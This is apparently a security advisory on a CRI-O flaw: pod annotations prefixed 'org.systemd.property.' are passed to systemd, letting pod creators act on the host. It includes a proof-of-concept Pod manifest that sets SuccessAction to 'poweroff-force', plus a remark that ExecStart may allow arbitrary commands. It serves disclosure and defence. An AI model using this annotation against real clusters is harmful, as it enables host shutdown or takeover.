CRI-O vulnerable to an arbitrary systemd property injection

Impact

On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:

---
apiVersion: v1
kind: Pod
metadata:
  name: poc-arbitrary-systemd-property-injection
  annotations:
    # I believe that ExecStart with an arbitrary command works here too,
    # but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
    org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
  containers:
    - name: hello
      image: [quay.io/podman/hello](http://quay.io/podman/hello)

This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.

Tested with CRI-O v1.24 on minikube.
I didn’t test the latest v1.29 because it is incompatible with minikube: https://github.com/kubernetes/minikube/pull/18367

Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
https://github.com/opencontainers/runc/pull/3923#discussion_r1532292536

CRI-O has to filter out annotations that have the prefix “org.systemd.property.”

See also:

• https://github.com/opencontainers/runtime-spec/blob/main/features.md#unsafe-annotations-in-configjson
• https://github.com/opencontainers/runc/pull/4217

Workarounds

Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations

References